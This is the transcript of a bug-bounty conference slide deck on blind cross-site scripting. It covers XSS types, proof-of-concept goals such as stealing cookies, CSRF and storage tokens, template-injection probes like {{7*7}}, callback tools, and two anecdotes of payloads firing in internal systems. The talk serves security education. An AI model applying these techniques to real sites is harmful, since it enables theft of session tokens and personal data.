Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Getting Blindly Lucky

JR0ch17
November 01, 2020

Getting Blindly Lucky

JR0ch17

November 01, 2020
Tweet

More Decks by JR0ch17

Other Decks in Technology

Transcript

  1. {{ agenda }} • What is XSS? • & •

    Blind XSS Stories • Questions/Comments
  2. {{ XSS }} Cross-Site Scripting (XSS) attacks are a type

    of injection, in which malicious scripts are injected into trusted websites.* • Malicious Script • Types of XSS • Reflected • DOM => postMessage() • Stored => Blind * https://owasp.org/www-community/attacks/xss/
  3. {{ XSS PoCs}} • Typical PoCs • Steal CSRF Tokens

    • Steal Cookies (if not HttpOnly) • Steal localStorage and sessionStorage tokens • Can also be used in CORS misconfigs with XHR or with the Fetch API to steal sensitive data (ie. PII) • SSRF if found in HTML to PDF converter
  4. {{ }} MVC client-side framework built by Google • XSS

    • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/navb4jh3/
  5. {{ }} “Progressive” MVVM client-side framework for building UIs and

    SPAs • XSS • Not the typical XSS • Template Injection • {{7*7}} => returns 49 https://jsfiddle.net/s6b3dy25/
  6. {{ Blind XSS }} Variant of a Stored XSS. The

    payload is saved and executed in a separate part of the application (ie. Admin panel) or in a completely different application (internal application) • Tools • XSSHunter • Sleepy Puppy • Burp Collaborator
  7. {{ HackerOne Hacktivity Blind XSS Reports }} All blind XSS

    payloads from HackerOne’s Hacktivity are from an HTML context (ie. <script> tag) Not a single one from template injection
  8. {{ Blind XSS Story #1 }} A Google search lead

    to Apple’s QuickLook feature QuickLook is a way to preview a file to view its contents instead of having to open the file
  9. {{ Blind XSS Story #1 }} When an XSS triggers

    with XSSHunter, it captures the DOM...
  10. {{ Blind XSS Story #1 }} Turns out the CSV

    file contained a LOT of PII...
  11. {{ Blind XSS Story #2 }} Someone had filed a

    complaint on my user!!! The complaint was forwarded as an email The XSS triggered in the email system!